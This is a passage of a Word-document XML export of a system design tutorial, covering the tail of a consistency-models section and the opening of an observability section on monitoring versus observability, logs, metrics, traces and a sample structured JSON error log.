      <w:r w:rsidRPr="005C5B1F">
        <w:t>│                                                       search,     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2496AC64" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>│                                                       caching     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43604594" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>└──────────────────────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5A2305" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental principle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFE5202" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Strong consistency makes distributed systems behave like a single machine — simple to reason about, but expensive in latency, availability, and throughput. Eventual consistency embraces the reality of distribution — replicas diverge temporarily but converge over time — gaining performance and availability at the cost of complexity in handling staleness. The art of system design is choosing the MINIMUM consistency level that satisfies each operation's correctness requirements — strong where money or safety demands it, eventual where freshness can be traded for speed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A516475" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Observability in System Design — In-Depth Technical Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F879BBE" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. What Observability Really Is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506EAD8D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Observability is the ability to understand the internal state of a system by examining its external outputs. It's the property of a system that allows you to ask arbitrary questions about its behavior — including questions you didn't anticipate — and get meaningful answers without deploying new code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4104D8C8" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental distinction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FD5356" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E72EC8D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Monitoring: "Is the system working?" (known-unknowns — predefined checks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E99CB0" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Observability: "WHY is the system broken?" (unknown-unknowns — ad-hoc investigation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522CE002" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="1E9A7EED" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:lastRenderedPageBreak/>
        <w:t>Monitoring tells you: "Error rate spiked to 5% at 14:30."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2804078A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">Observability tells you: "The 5% errors are all from user_id=X, hitting endpoint /checkout, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA210E0" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  on pod api-server-7, connecting to database shard-3, which has 99.8% disk utilization,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6E2FC1" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  causing query timeouts on the orders_2024_05 partition."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572AB270" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why observability exists as a discipline:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0C5CCA" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21506CA7" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Monolithic application (2010):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25651025" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Single process, single machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31292E3D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Debugger + logs + top = sufficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DFA8FD" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Failure modes are few and reproducible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0662A8B0" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="11EE12F3" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Distributed microservices (2024):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7559B1CA" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - 200 services, 5000 pods, 50 databases, 3 regions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D069775" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - A single user request touches 15 services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ED2DC2" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Failure is PARTIAL (service A is slow for 2% of requests to shard 7).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3601458B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Problems emerge from INTERACTIONS between healthy components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D5A5B5" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Cannot reproduce in dev (requires production traffic patterns).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44430425" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Debuggers are useless (can't attach to 200 services simultaneously).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A02CECA" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="38C402EF" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">Observability bridges this gap: instruments the system so engineers can reason about </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B165B6" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>arbitrarily complex failures from external signals alone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A97DD9E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:pict w14:anchorId="0B4EDAAF">
          <v:rect id="_x0000_i6131" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1DE2D2" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. The Three Pillars of Observability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289365D6" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.1 Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B68A86" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AED10F8" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>┌─────────────────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B0CF36" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:lastRenderedPageBreak/>
        <w:t>│                    OBSERVABILITY                                  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110A31A6" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1F576A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│      LOGS        │     METRICS      │        TRACES             │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00695A7F" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│                  │                  │                           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C17D92" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│ What happened    │ How the system   │ How a request flows       │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFB3629" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│ (discrete events)│ is performing    │ through services          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5959AF3D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│                  │ (aggregated      │ (distributed context)     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A4AA2C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│ "Request failed  │  numbers)        │                           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28215338" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  with error X    │                  │ "Request spent 200ms in   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21826124" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  for user Y      │ "p99 latency    │  service A, then 50ms in  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D554BB" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  at time T"      │  is 450ms"      │  service B, then 300ms    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10205BAF" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│                  │                  │  waiting for DB on shard 3"│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446A0292" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┼</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┼</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F16525" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│ High cardinality │ Low cardinality  │ High cardinality          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C20892" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│ High volume      │ Low volume       │ Medium volume             │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CF917E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│ Expensive to     │ Cheap to store   │ Expensive to store        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200D816A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│ store/query      │ and query        │ (sampling helps)          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412A960D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>└──────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┴</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┴</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CB42B2" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2 Logs — Discrete Events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CA7591" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What logs are:</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t> Timestamped, immutable records of discrete events that happened in the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630CF96A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>JSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C94B20" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C53C884" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  "timestamp": "2026-05-28T14:30:05.123Z",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15404B25" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  "level": "ERROR",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8F8017" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  "service": "payment-service",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4231CE4B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  "trace_id": "abc123def456",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC3E838" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  "span_id": "789ghi",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B05F11" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  "user_id": "user-42",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3C0E42" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  "message": "Payment processing failed",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFBAFDA" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  "error": "timeout connecting to stripe API",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9608AD" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  "duration_ms": 30000,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD79D73" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  "endpoint": "/api/v1/charge",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C0455A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  "amount": 99.99,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49318235" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  "currency": "USD",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5D167B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  "retry_count": 3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D341D64" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  "pod": "payment-service-7b8f9-xk2m4",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23583B5A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  "node": "ip-10-0-3-47",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE9C41D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  "region": "us-east-1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45154CE6" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D33EE84" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Log levels and their purpose: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64"/>
        <w:gridCol w:w="3930"/>
        <w:gridCol w:w="4256"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A2456" w:rsidRPr="007A2456" w14:paraId="56C95FB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522B6D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A2456">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Level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58B688" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
